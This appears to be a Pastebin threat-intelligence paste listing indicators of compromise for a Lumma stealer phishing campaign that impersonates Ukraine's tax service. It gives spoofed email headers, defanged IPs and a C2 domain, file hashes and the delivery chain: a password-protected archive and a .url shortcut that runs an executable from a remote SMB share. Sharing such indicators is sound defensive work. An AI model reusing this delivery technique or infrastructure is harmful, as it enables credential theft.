API tools faq
paste
Advertisement
VRad

#lumma_300124

VRad
Feb 2nd, 2024 (edited)
68
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.17 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #Lumma #Stealer #LNK #SMB #RAR #PWD
  2.  
  3. https://pastebin.com/pgjwR07Z
  4.  
  5. previous_contact:
  6. 27/01/24 https://pastebin.com/4B3hwvpx
  7. 25/01/24 https://pastebin.com/pwL5HdeX
  8.  
  9. FAQ:
  10. https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
  11.  
  12. attack_vector
  13. --------------
  14. email attach .7z > .rar (PWD) > .url > \\ 89_23_98_22 \ UR \ lmncr2rs.exe > crisisestimatehealtwh_site / api (C2)
  15.  
  16. # # # # # # # #
  17. email_headers
  18. # # # # # # # #
  19. Date: Tue, 30 Jan 2024 08:52:51 +0300
  20. Subject: Запит ДПСУ (Вимога)
  21. From: Рак Ясногор Тимурович <facebook @ spacollection_hk>
  22. Reply-To: Державна податкова служба України <post @ tax_gov_ua>
  23. Received: from mail_spacollection_hk ([103_226_95_162])
  24. Received: from WIN - LCETV91VPS6 (plum - development2_aeza_one [79_137_205_213])
  25. Message-ID: <C35FA500- D8C7- 477E- A139- BA159B9F55CD @ mail_spacollection_hk>
  26.  
  27. # # # # # # # #
  28. files
  29. # # # # # # # #
  30. SHA-256 34b826565968ff34edc9617c3f6d997ce9721baf514de310d2761bc203b81f81
  31. File name Запит.7z [7-zip archive data, version 0.4]
  32. File size 855 B (855 bytes)
  33.  
  34. SHA-256 57aaab5b85b3e0d4b6b3033d15bfbf170ab93da94188df339ef4401f76fe6762
  35. File name doc.rar [RAR archive data, v5] !PWD
  36. File size 446 B (446 bytes)
  37.  
  38. SHA-256 c73de9036435ed3a51b4864af55b159901914ddc0e90b0ca7d954a6e500cf26f
  39. File name Офіційний запит.pdf.url [URL, Internet shortcut]
  40. File size 170 B (170 bytes)
  41.  
  42. SHA-256 cc47d0324b09a84924c41bf62b955e73688483645489ae8638164feac38192d3
  43. File name lmncr2rs.exe [.NET executable , Smart Assembly ] !LUMMA
  44. File size 10.85 MB (11374080 bytes)
  45.  
  46. SHA-256 d484cb34534d598e0597aa44ae065b7ff666922e481fcf4e83cb7d1011972266
  47. File name unpacked.exe [PE32 executable] !LUMMA
  48. File size 536.00 KB (548864 bytes)
  49.  
  50. # # # # # # # #
  51. activity
  52. # # # # # # # #
  53.  
  54. PL_SCR \\ 89_23_98_22 \ UR \ lmncr2rs.exe
  55.  
  56. C2 crisisestimatehealtwh_site / api
  57.  
  58.  
  59. netwrk
  60. --------------
  61. 89_23_98_22 445 SMB Negotiate Protocol Request
  62. 89_23_98_22 445 TCP 49348 → 445 [SYN]
  63.  
  64. comp
  65. --------------
  66. System 4 TCP 89_23_98_22 445 ESTABLISHED
  67. System 4 TCP 89_23_98_22 445 ESTABLISHED
  68.  
  69. proc
  70. --------------
  71. Explorer.EXE \\ 89_23_98_22 \ UR \ lmncr2rs.exe
  72. lmncr2rs.exe
  73. lmncr2rs.exe
  74.  
  75. persist
  76. --------------
  77. n/a
  78.  
  79. drop
  80. --------------
  81. n/a
  82.  
  83. # # # # # # # #
  84. additional info
  85. # # # # # # # #
  86. n/a
  87.  
  88. # # # # # # # #
  89. VT & Intezer
  90. # # # # # # # #
  91. https://www.virustotal.com/gui/file/34b826565968ff34edc9617c3f6d997ce9721baf514de310d2761bc203b81f81/details
  92. https://www.virustotal.com/gui/file/57aaab5b85b3e0d4b6b3033d15bfbf170ab93da94188df339ef4401f76fe6762/details
  93. https://www.virustotal.com/gui/file/c73de9036435ed3a51b4864af55b159901914ddc0e90b0ca7d954a6e500cf26f/details
  94. https://www.virustotal.com/gui/file/cc47d0324b09a84924c41bf62b955e73688483645489ae8638164feac38192d3/details
  95. https://www.virustotal.com/gui/file/d484cb34534d598e0597aa44ae065b7ff666922e481fcf4e83cb7d1011972266/details
  96.  
  97. VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!